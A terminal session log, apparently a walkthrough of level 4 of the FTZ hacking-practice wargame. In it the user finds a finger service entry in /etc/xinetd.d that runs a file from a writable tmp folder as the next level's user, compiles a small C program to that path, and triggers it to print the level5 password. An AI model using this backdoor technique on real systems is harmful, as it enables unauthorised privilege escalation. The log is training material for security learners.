login as: level4
level4@192.168.244.128's password:
[level4@ftz level4]$ suck my brain
-bash: suck: command not found
[level4@ftz level4]$ ls
hint public_html tmp
[level4@ftz level4]$ cat hint
누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!
[level4@ftz level4]$ cd /etc/xinetd.d
[level4@ftz xinetd.d]$ ls
backdoor daytime echo-udp rexec rsync sgi_fam time
chargen daytime-udp finger rlogin servers talk time-udp
chargen-udp echo ntalk rsh services telnet
[level4@ftz xinetd.d]$ file backdoor
backdoor: ASCII text
[level4@ftz xinetd.d]$ cat backdoor
service finger
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = level5
server = /home/level4/tmp/backdoor
log_on_failure += USERID
}
[level4@ftz xinetd.d]$ cd /home/level4/tmp
[level4@ftz tmp]$ ls
[level4@ftz tmp]$ cat > backdoor.c
#include <stdio.h>
#include <stdlib.h>
int main(){
system("my-pass");
return 0;
}
[level4@ftz tmp]$ gcc -o backdoor backdoor.c
[level4@ftz tmp]$ ls
backdoor backdoor.c
[level4@ftz tmp]$ finger @localhost
^[[H^[[J
Level5 Password is "what is your name?".